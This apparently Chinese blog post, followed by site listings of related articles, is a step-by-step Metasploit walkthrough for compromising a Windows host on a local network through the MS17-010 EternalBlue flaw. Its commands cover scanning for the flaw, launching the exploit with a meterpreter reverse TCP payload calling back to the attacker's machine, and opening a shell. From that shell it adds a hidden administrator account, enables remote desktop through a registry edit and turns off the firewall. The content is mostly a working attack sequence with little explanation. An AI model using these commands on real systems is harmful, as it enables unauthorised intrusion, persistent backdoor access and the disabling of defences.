msf对主机的渗透

最新推荐文章于 2024-06-15 21:37:48 发布
最新推荐文章于 2024-06-15 21:37:48 发布
阅读量615 收藏
点赞数
分类专栏: msf 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aixioxiaoxaio/article/details/110553425
版权

1.开始启动msf。

root@zs:~# msfconsole

在这里插入图片描述

2.查看主机是否存在漏洞。

msf6 > search ms17

在这里插入图片描述

3.

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.14
RHOSTS => 192.168.1.14
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

在这里插入图片描述

4.接下来就去开始配置exp,然后开干。

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.14
RHOST => 192.168.1.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
然后开干。

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述

5.然后拿shell。

meterpreter > shell
Process 1292 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>net user heihei 111 /add
net user heihei 111 /add
�����ɹ����ɡ�


C:\Windows\system32>net localgroup administrators heihei /add         
net localgroup administrators heihei /add
�����ɹ����ɡ�

在这里插入图片描述

打开3389端口的命令。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

6.看看3389端口是否开启

C:\Windows\system32>netstat -an

强制关闭防火墙的命令

netsh advfirewall set allprofiles state off

在这里插入图片描述

开了。那么接下来就可以干了。

7.远程连接靶机。

root@zs:~# rdesktop 192.168.1.14

在这里插入图片描述
在这里插入图片描述

完工。(对了,靶机的防火墙要关掉,不然没办法远程。)

后土轮回台
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF远程渗透windows主机
Cwillchris的博客
05-04 716
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学 1、环境准备 准备好 kali linux (IP为192.168.98.30) Windows靶机(IP为192.168.98.150,可以是任意没有安装杀软的Windows机器,有兴趣的可以让不在一个局域网的朋友配合一下) 2、申请免费公网隧道 打开Sunny网 ,注册个账号 按要求注册一个账号,然后登录 然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..
网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2859
内网渗透超级强悍
47-4 内网渗透 - MSF介绍
最新发布
weixin_43263566的博客
06-15 156
Metasploit框架(Metasploit Framework, MSF)是一款开源工具,专为渗透测试设计。它由Ruby编程语言编写,具有高度的扩展性,可以方便渗透测试人员开发和使用定制化的工具模板。Metasploit提供多种接口来控制测试过程,包括控制台、Web界面和命令行界面(CLI)。推荐使用控制台接口,因为它可以访问和使用所有Metasploit的插件,如Payload、漏洞利用模块、后渗透模块等。
msf完整渗透测试
clayzx的博客
11-15 6541
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6298
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
180213 渗透-MSF入门(1)
whklhhhh的博客
02-14 1192
1625-5 王子昂 总结《2018年2月13日》 【连续第501天总结】 A. MSF入门 B. 介绍MetaSpolit Framework简称MSF,是一款渗透测试框架 常用模块有5个 Exploits 渗透攻击模块 主要用于攻击形式 Auxiliary 辅助模块 主要用于信息收集 Payloads 攻击载荷模块 主要用于攻击效果、目标 Encodes 编码模块 主要用于编码转
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
基于msf的后渗透协作平台 -- 后端部分.zip
03-03
1. **数据管理**:后端通常包含一个数据库管理系统,用于存储渗透测试过程中的信息,如目标主机、漏洞利用结果、会话信息等。这些数据的组织和管理对于分析测试结果,追踪渗透进度至关重要。 2. **API接口**:为了...
msf命令全集
06-05
MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:从当前环境返回...
msf使用方法
06-29
- `db_autopwn -t -p -e`自动对数据库中的主机和服务进行攻击。 ### Payload生成与编码 - `./msfpayload <payload> <variable=value> <outputtype>`生成Payload。 - `-S`显示Payload的摘要和选项。 - `-C`生成...
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4159
内网渗透木马测试
科普:msf内网渗透实例
李慖铖dē個亻專欄
07-24 4759
科普:msf内网渗透实例 一直以来很想用msf实验一次内网渗透,体验一下内网渗透的快感。在内网里的世界也更大。 话不多说,让我们跟着节奏走。要用msf中的meterpreter进行后续渗透 首先要有一个反弹的shell,这里介绍两种payload Windows/meterpreter/reverse_tcp Windows/meterpreter/reverse_http
msfvenom的使用&免杀&外网渗透
`or 1 or 不正经の泡泡
03-13 5834
msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用 参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你
msf渗透脚本之交换鼠标左右功能
Cosmopolitan的博客
03-07 1187
swap.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &lt; Msf::Post include Msf::...
渗透之——利用Metasploit找出SCADA服务器
冰河的专栏
01-17 3776
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86531784 1.注册账号 首先,我们在https://www.shodan.io上注册一个账号 2.获取API Key 注册账号成功之后,我们获取一个免费的API Key 3.在Metasploit中找出采用罗克韦尔自动化技术的SCADA系统 msfconso...
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1937
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2918
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
MSF渗透基础知识
m0_63917373的博客
02-20 409
MSF windows提权 渗透安卓 Metasploit
使用kali 中的msf对自己的手机进行渗透的完整指令
06-11
以下是在 Kali 中使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台中,输入 `use exploit/multi/handler...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值